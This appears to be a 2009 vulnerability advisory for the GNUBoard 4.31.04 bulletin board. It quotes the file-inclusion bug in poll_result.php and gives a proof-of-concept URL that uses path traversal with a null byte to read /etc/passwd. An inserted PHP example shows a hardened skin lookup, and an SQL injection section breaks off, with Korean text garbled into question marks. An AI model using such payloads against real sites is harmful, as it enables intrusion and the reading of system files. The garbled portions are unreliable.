
# Title : GNUBoard 4.31.04 (09.01.30) Multiple Local/Remote Vulnerabilities
# Published : 2009-01-30
# Author : make0day


GNUBoard V4.31.04 (09.01.30) Multiple Local/Remote Vulnerability
bY make0day@gmail.com

/*************************

SIR GNUBoard (version 4.31.04 (09.01.30)) is a bulletin board system widely used in Korea.
It is freely available for all platforms that support PHP and MySQL.
We found a file include vulnerability that affects SIR GNUBoard.
Under special conditions, it may be usable as a remote file include vulnerability.
This issue can be used to execute arbitrary PHP code on an affected computer with the privileges of the affected Web server.
Here are the details:

**************************/
TESTED ON VERSION 4.31.04 (08.01.30)

/***************************
Local File Inclusion Vulnerability

/poll_result.php

include_once("./_common.php");

$po = sql_fetch(" select * from $g4[poll_table] where po_id = '$po_id' ");
if (!$po[po_id]) 

????????

echo "<script language='javascript' src='$g4[path]/js/sideview.js'></script>";

if (!$skin_dir) $skin_dir = "basic";
$poll_skin_path = "$g4[path]/skin/poll/$skin_dir";
include_once ("$poll_skin_path/poll_result.skin.php");	//file include

*************************/

poc:
http://test.com/GnuBoard/bbs/poll_result.php?po_id=177&skin_dir=../../../../../../../../etc/passwd%00
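
A hardened form of the skin lookup shown in the poll_result.php excerpt, as an added example (not GNUBoard's code and not the advisory author's). The helper name resolve_poll_skin() and the demo directory are hypothetical; the skin/poll/<name>/poll_result.skin.php layout and the "basic" default are taken from the excerpt.

```php
<?php
// Added example, not GNUBoard code. resolve_poll_skin() is a hypothetical helper.
// Directory layout (skin/poll/<name>/poll_result.skin.php) is taken from the excerpt.

function resolve_poll_skin(string $base_path, $skin_dir): string
{
    $skin_root = realpath($base_path . '/skin/poll');
    if ($skin_root === false) {
        throw new RuntimeException('poll skin root not found');
    }

    // Step 1: allowlist. One directory name only: no slashes, dots or NUL bytes.
    // Anything else falls back to the default skin, as the original code does for empty input.
    if (!is_string($skin_dir) || !preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $skin_dir)) {
        $skin_dir = 'basic';
    }

    // Step 2: canonicalize, then require the result to sit under the skin root.
    // realpath() resolves symlinks and returns false for missing files.
    $target = realpath("$skin_root/$skin_dir/poll_result.skin.php");
    $prefix = $skin_root . DIRECTORY_SEPARATOR;
    if ($target === false || strncmp($target, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException('unknown poll skin');
    }
    return $target;
}

// Constructed demo tree and inputs, so the script runs offline.
$base = sys_get_temp_dir() . '/g4_demo_' . getmypid();
mkdir("$base/skin/poll/basic", 0700, true);
file_put_contents("$base/skin/poll/basic/poll_result.skin.php", "<?php // constructed skin\n");

$inputs = ['basic', "../../../../etc/passwd\0", 'basic/../..', ['x'], 'nosuchskin'];
foreach ($inputs as $in) {
    try {
        $path = resolve_poll_skin($base, $in);
        echo json_encode($in), ' -> ', substr($path, strlen(realpath($base))), "\n";
    } catch (RuntimeException $e) {
        echo json_encode($in), ' -> rejected: ', $e->getMessage(), "\n";
    }
}

// Remove the constructed tree.
unlink("$base/skin/poll/basic/poll_result.skin.php");
foreach (['/skin/poll/basic', '/skin/poll', '/skin', ''] as $d) {
    rmdir($base . $d);
}
```

In poll_result.php the returned path would be the only argument passed to include_once, with the skin name read explicitly from the request rather than from a variable the script never assigns.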

/***************************
SQL Injection Vulnerability

/register_form.skin.php

<?
if (!defined("_GNUBOARD_")) exit;
?>

<style type="text/css">
<!--

????????

function fregisterform_submit(f) 
{
    if (f.w.value == "") {

        reg_mb_id_check();

        if ($F('mb_id_enabled')!='000') {	
            alert('?????????????